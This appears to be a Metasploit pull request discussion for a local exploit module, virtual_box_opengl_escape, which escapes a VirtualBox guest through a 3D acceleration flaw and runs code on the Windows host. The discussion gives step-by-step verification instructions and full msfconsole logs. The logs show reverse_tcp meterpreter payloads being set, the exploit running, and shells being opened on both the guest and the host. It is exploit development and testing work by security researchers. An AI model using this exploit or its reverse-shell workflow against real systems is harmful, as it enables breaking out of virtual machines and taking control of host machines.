Virtual box 3D Acceleration OpenGL Host escape

[jvazquez-r7]

Module for vulnerability discussed here: http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=oracle_virtualbox_3d_acceleration
And exploitation discussed here: http://www.vupen.com/blog/20140725.Advanced_Exploitation_VirtualBox_VM_Escape.php

At the moment this module doesn't add the CoE proposed by VUPEN, even when it looks feasible from the description. With the actual payload system, looks like the place to add the post-exploitation code to fix the corrupted process should be by adding the stub as "Append". Unfortunately, the Append stub code only will be reached when the user "exit" from the achieved meterpreter. Using migrate as initial script doesn't help, since the original process will crash before reaching the "Append" stub, so there is no opportunity to restore the process. Modifying the current payload system is out of the scope of this pull request atm, but definitely would like to look into it. Feedback is welcome!

Also, even without the CoE code proposed by VUPEN, by just "fixing" the stack, things are not "so busted" and the guest will continue executing unless other code tries to use the '.\VBoxGuest' device. Even with it, I've marked Rank as AverageRanking . I don't mind to lower it even more if anyone thinks it should be done. The session can be executed and even exited in the Host system, and both the host and guest keep running on my tests (Unless the Guest tries to access the named device of course, in this case the Guest probably will die :-( )

• Verification
• Install Windows 7 SP1 64 bits system as host
• Instal Virtual Box 4.3.6 from bin packages
• Install Windows XP SP 32 bits as Guest (I've not tried with other windows system as virtual boxes, even when I think the exploit should work, will update with feedback once I get some time for more testing).
• While powered-off, enable 3D Acceleration for the Virtual Box Guest. Use the VirtualBox manager. From the guest's settings, goto "Display" and select the check box "Enable 3D Acceleration"
• In the Virtual Box guest install the Virtual Box Guest Tools with support for 3D. The guest tools must be installed on safe mode. On windows XP SP3 just press F8 while init to run on "safe mode".
• Get a session on the Guest (XP SP 32 bits) and background it

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(handler) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Sending stage (769536 bytes) to 172.16.158.226
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.226:49166) at 2014-08-09 01:57:27 -0500

meterpreter > background

• Use the local exploit to escape to the Host (Use a 64 bits payload)

msf exploit(handler) > use exploit/windows/local/virtual_box_opengl_escape
msf exploit(virtual_box_opengl_escape) > set session 1
session => 1
msf exploit(virtual_box_opengl_escape) > set payload windows/x64/meterpreter/reverse_
^C[-] Error while running command set:
msf exploit(virtual_box_opengl_escape) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(virtual_box_opengl_escape) > set LHOST 172.16.158.1
LHOST => 172.16.158.1
msf exploit(virtual_box_opengl_escape) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] Opening device...
[+] \\.\VBoxGuest found, exploiting...
[*] Connecting to the service...
[+] Client ID 19
[*] Calling SET_VERSION...
[*] Calling SET_PID...
[*] Sending First 0xEA Opcode Message to control head_spu...
[*] Sending Second 0xEA Opcode Message to execute payload...
[*] Sending stage (972288 bytes) to 172.16.158.226
[*] Meterpreter session 2 opened (172.16.158.1:4444 -> 172.16.158.226:49167) at 2014-08-09 01:58:00 -0500

• Check with the new session (Host) is usable and exit it:

[*] Sending stage (972288 bytes) to 172.16.158.226
[*] Meterpreter session 2 opened (172.16.158.1:4444 -> 172.16.158.226:49167) at 2014-08-09 01:58:00 -0500

meterpreter > getuid
Server username: WIN-369V5BV1B34\juan
meterpreter > sysinfo
Computer        : WIN-369V5BV1B34
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Meterpreter     : x64/win64
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.226 - Meterpreter session 2 closed.  Reason: User exit

• Check which the original session in the Guest is usable still

msf exploit(virtual_box_opengl_escape) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: J-2BD499D1E94E4\juan
meterpreter > sysinfo
Computer        : J-2BD499D1E94E4
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.0.2.15 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(virtual_box_opengl_escape) > exit -y
AUS-MAC-0916:metasploit-framework jvazquez$

[wchen-r7]

Sometimes this works:

msf exploit(virtual_box_opengl_escape) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] Opening device...
[+] \\.\VBoxGuest found, exploiting...
[*] Connecting to the service...
[+] Client ID 79
[*] Calling SET_VERSION...
[*] Calling SET_PID...
[*] Sending First 0xEA Opcode Message to control head_spu...
[*] Sending Second 0xEA Opcode Message to execute payload...
[*] Sending stage (972288 bytes) to 192.168.1.110
[*] Meterpreter session 2 opened (192.168.1.64:4444 -> 192.168.1.110:49689) at 2014-08-13 15:19:56 -0500

But sometimes there's a connection problem. Juan is still looking into it.